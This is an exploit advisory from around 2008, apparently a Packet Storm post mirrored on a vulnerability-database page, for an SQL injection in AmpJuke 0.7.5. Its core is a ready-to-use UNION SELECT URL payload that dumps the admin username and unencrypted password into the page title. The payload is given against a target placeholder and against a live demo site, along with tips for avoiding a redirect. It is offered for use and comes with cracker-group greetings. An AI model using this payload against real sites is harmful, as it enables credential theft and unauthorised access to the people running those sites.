Lucene search
K

ampjuke-sql.txt

🗓️ 03 Oct 2008 00:00:00Reported by S_DLA_S Th3 1r4Q1 Cr4Ck3rType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 27 Views

AmpJuke 0.7.5 SQL Injection vulnerability description. Admin's username and password can be retrieved from the title. Unencrypted password will be displayed

Code
`  
############################################################  
|-------------------------(S_DLA_S)-------------------------  
|  
| Script : AmpJuke 0.7.5  
| Vuln. Type : SQL Injection  
| Founded By : S_DLA_S Th3 1r4Q1 Cr4Ck3r  
| CoNt4Ct : sdlas[at]Hotmail[d0t]Fr  
| Home : wWw.Iq-Ty.CoM | WwW.SdlaS-IQ.Co.CC  
|  
#############################################################  
  
Th3 eXpl0T :  
WwW.[Target].co.il/[script]/index.php?what=performerid&start=0&count='20&special=-2/**/UNION/**/SELECT/**/1,concat(name,0x3A7C3A,password)/**/FROM/**/user/**/WHERE/**/id=1/*  
  
ps 1: Th3 Admin's Username And Pass Will Show up In The Title  
like username:|:password  
  
ps 2: Th3 pass will Sh0w up N0t encrypted lo0olz  
  
L!v3 D3m0 :  
http://www.ampjuke.org/ampjukedemo/index.php?what=performerid&start=0&count='20&special=-2/**/UNION/**/SELECT/**/1,concat(name,0x3A7C3A,password)/**/FROM/**/user/**/WHERE/**/id=1/*  
  
Notice :  
1.Th3 Admin's Username And Pass Will Show up In The Title  
like username:|:password  
2.Th3 pass will Sh0w up N0t encrypted lo0olz  
3.Stop Th3 page Before it's Fully loaded Cuz U will Be redirected or Disable Java Script  
  
################################################################  
|---------------------------(S_DLA_S)---------------------------  
| Gr33tz 2 All Th3 M3mb3rz Of : WwW.Iq-Ty.c0M | wWw.TryAg.cc/cc  
| Gr33tz 2: H-T Team specially Houssamix | Hussin-X | str0ke  
| Karar Alshame | Cyber-Zone | All Muslim H4Ck3rz  
| I am IRAQI  
################################################################  
  
  
  
  
_________________________________________________________________  
Sur Windows Live Ideas, découvrez en exclusivité de nouveaux services en ligne... si nouveaux qu'ils ne sont pas encore sortis officiellement sur le marché !  
http://ideas.live.com`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation